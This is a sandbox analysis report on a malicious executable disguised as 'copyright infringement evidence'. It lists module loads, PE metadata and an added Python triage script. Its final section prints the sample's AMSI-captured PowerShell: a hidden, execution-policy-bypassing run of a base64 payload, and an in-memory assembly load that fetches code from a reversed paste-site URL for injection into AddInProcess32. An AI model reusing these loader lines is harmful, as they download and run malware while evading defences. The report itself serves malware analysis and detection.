Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: jscript.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mlang.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msxml6.dll
Source: C:\Windows\System32\wscript.exe Section loaded: winhttpcom.dll
Source: C:\Windows\System32\wscript.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\wscript.exe Section loaded: webio.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\wscript.exe Section loaded: schannel.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\wscript.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\wscript.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\wscript.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\PING.EXE Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PING.EXE Section loaded: winnsi.dll
Source: C:\Windows\System32\PING.EXE Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: jscript.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mlang.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msxml6.dll
Source: C:\Windows\System32\wscript.exe Section loaded: winhttpcom.dll
Source: C:\Windows\System32\wscript.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: ondemandconnroutehelper.dll
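The module-load records above are more useful when they are rolled up per process image: which script engine wscript.exe actually bound, whether the hosts pulled in network and TLS libraries, and whether AMSI and WLDP were in the picture when powershell.exe ran. The following Python is an added triage example, not part of the sandbox report or its vendor's tooling. The embedded records are a constructed subset copied from this report (with one non-matching record type to show it is skipped), and the capability rule table is an analyst's interpretation of what each DLL combination implies, not something the sandbox emits.

```python
import re
from collections import Counter, defaultdict

# One "Section loaded" record per line, as the report prints them.
RECORD_RE = re.compile(r"^Source: (?P<image>.+?) Section loaded: (?P<dll>\S+)$")

# Constructed input: a subset of this report's records, copied verbatim. Not the full dump.
SAMPLE_RECORDS = r"""
Source: C:\Windows\System32\wscript.exe Section loaded: jscript.dll
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msxml6.dll
Source: C:\Windows\System32\wscript.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: schannel.dll
Source: C:\Windows\System32\PING.EXE Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32
"""

# Analyst-written rules (assumption, not sandbox output):
# (image basename or None for any image, DLLs that must all be present, capability tag)
CAPABILITY_RULES = [
    ("wscript.exe", {"jscript.dll"}, "JScript engine bound (the script is JS, not VBS)"),
    ("wscript.exe", {"scrrun.dll"}, "Scripting runtime (FileSystemObject/Dictionary) available"),
    ("wscript.exe", {"msxml6.dll", "winhttp.dll"}, "HTTP client capability (MSXML + WinHTTP)"),
    (None, {"schannel.dll"}, "TLS via Schannel: outbound HTTPS likely"),
    (None, {"amsi.dll"}, "AMSI initialised: content exposed to the registered AV provider"),
    ("powershell.exe", {"wldp.dll"}, "WLDP queried (lockdown / Device Guard policy check)"),
    ("powershell.exe", {"mscoree.dll"}, "CLR bootstrap (Windows PowerShell on .NET)"),
]


def parse_loaded_modules(text: str) -> dict:
    """Group 'Section loaded' records by process image basename, preserving load order."""
    loads = defaultdict(list)
    for line in text.splitlines():
        m = RECORD_RE.match(line.strip())
        if not m:
            continue  # other record types (registry, file, window) are ignored here
        image = m.group("image").rsplit("\\", 1)[-1].lower()
        loads[image].append(m.group("dll").lower())
    return dict(loads)


def repeated_loads(loads: dict) -> dict:
    """DLLs recorded more than once for the same image: either several process
    instances in the run or a load/unload/reload cycle inside one process."""
    out = {}
    for image, dlls in loads.items():
        rep = {d: c for d, c in Counter(dlls).items() if c > 1}
        if rep:
            out[image] = rep
    return out


def capabilities(loads: dict) -> dict:
    """Apply CAPABILITY_RULES to each image's DLL set; images with no hits are omitted."""
    tags = {}
    for image, dlls in loads.items():
        have = set(dlls)
        hits = [tag for proc, need, tag in CAPABILITY_RULES
                if (proc is None or proc == image) and need <= have]
        if hits:
            tags[image] = hits
    return tags


if __name__ == "__main__":
    loads = parse_loaded_modules(SAMPLE_RECORDS)
    for image, hits in capabilities(loads).items():
        print(image)
        for h in hits:
            print("  -", h)
    print("repeated loads:", repeated_loads(loads))
```

Run against the full report the rule table will also pick up wldp.dll under wscript.exe and the WinHTTP/Schannel pair in several PowerShell instances; extend CAPABILITY_RULES rather than hard-coding process names in the parser, so the same code works on the next report.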
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: copyright_infringement_evidence_1.exe Static PE information: certificate valid
Source: copyright_infringement_evidence_1.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: copyright_infringement_evidence_1.exe Static PE information: Image base 0x140000000 > 0x60000000
Source: copyright_infringement_evidence_1.exe Static file information: File size 2215688 > 1048576
Source: copyright_infringement_evidence_1.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x158800
Source: copyright_infringement_evidence_1.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: copyright_infringement_evidence_1.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: copyright_infringement_evidence_1.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: copyright_infringement_evidence_1.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: copyright_infringement_evidence_1.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: copyright_infringement_evidence_1.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: copyright_infringement_evidence_1.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: copyright_infringement_evidence_1.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb{ source: powershell.exe, 00000034.00000002.3072232839.000002105615A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb A source: powershell.exe, 00000034.00000002.3072232839.000002105615A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ib.pdb%~ source: powershell.exe, 00000023.00000002.2349006355.000002080DEC9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000024.00000002.2530773405.000001EF69F80000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdb source: powershell.exe, 00000023.00000002.2517360363.0000020827DD5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2526910009.0000020828190000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.3054808886.0000021055D8E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.3054808886.0000021055D65000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: btem.pdb source: powershell.exe, 00000034.00000002.2529930653.000002103BD5B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: bpdbtem.pdbn source: powershell.exe, 00000023.00000002.2517360363.0000020827D23000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000024.00000002.2530773405.000001EF69FC3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000034.00000002.3054808886.0000021055D65000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb2[0 source: powershell.exe, 00000023.00000002.2526910009.00000208281C2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb-d source: powershell.exe, 00000034.00000002.3072232839.000002105615A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb}i source: powershell.exe, 00000023.00000002.2517360363.0000020827DD5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000034.00000002.3072232839.000002105615A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: re.pdb source: powershell.exe, 00000034.00000002.2529930653.000002103BD5B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: copyright_infringement_evidence_1.pdb source: copyright_infringement_evidence_1.exe, copyright_infringement_evidence_1.exe, 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000000.2054790226.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmp
Source: Binary string: System.pdbs\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 Are source: powershell.exe, 00000024.00000002.2530773405.000001EF69FC3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ystem.Core.pdb/ source: powershell.exe, 00000023.00000002.2517360363.0000020827D23000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000023.00000002.2349006355.000002080DEC9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000023.00000002.2526910009.00000208281C2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2522177063.000001EF69D90000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.3072232839.000002105615A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000023.00000002.2526910009.00000208281B4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2530773405.000001EF69F80000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.3072232839.000002105615A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.pdb source: powershell.exe, 00000024.00000002.2530773405.000001EF69F80000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: CallSite.Target.pdbm source: powershell.exe, 00000023.00000002.2530199536.0000020828219000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: *e.pdb source: powershell.exe, 00000023.00000002.2526910009.00000208281C2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000023.00000002.2526910009.00000208281C2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.3072232839.000002105615A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbCLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000023.00000002.2349006355.000002080DEC9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2530773405.000001EF69FC3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.3072232839.000002105615A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb source: powershell.exe, 00000024.00000002.2530773405.000001EF69FC3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\dll\System.pdb source: powershell.exe, 00000024.00000002.2530773405.000001EF69F80000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbC source: powershell.exe, 00000024.00000002.2530773405.000001EF69FC3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ion.pdb source: powershell.exe, 00000034.00000002.3072232839.000002105615A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: re.pdbZJK source: powershell.exe, 00000034.00000002.2529930653.000002103BD5B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 6?ystem.Core.pdb=K source: powershell.exe, 00000034.00000002.2529930653.000002103BD5B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbLZ source: powershell.exe, 00000023.00000002.2526910009.00000208281C2000.00000004.00000020.00020000.00000000.sdmp
Source: copyright_infringement_evidence_1.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: copyright_infringement_evidence_1.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: copyright_infringement_evidence_1.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: copyright_infringement_evidence_1.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: copyright_infringement_evidence_1.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: $Codigo = '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';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD$global:?
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: Assembly]::Load($binaryContent); $command = '[dnlib.IO.Home]::VAI("0/KSAcF/d/ee.etsap//:sptth", "1", "C:\ProgramData\", "rajado", "AddInProcess32", "desativado","")'; Invoke-Expression $command
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($base64Content); $assembly = [Reflection.Assembly]::Load($binaryContent); $command = '[dnlib.IO.Home]::VAI("0/KSAcF/d/ee.etsap//:sptth", "1", "C:\ProgramData\", "rajado", "AddInProces
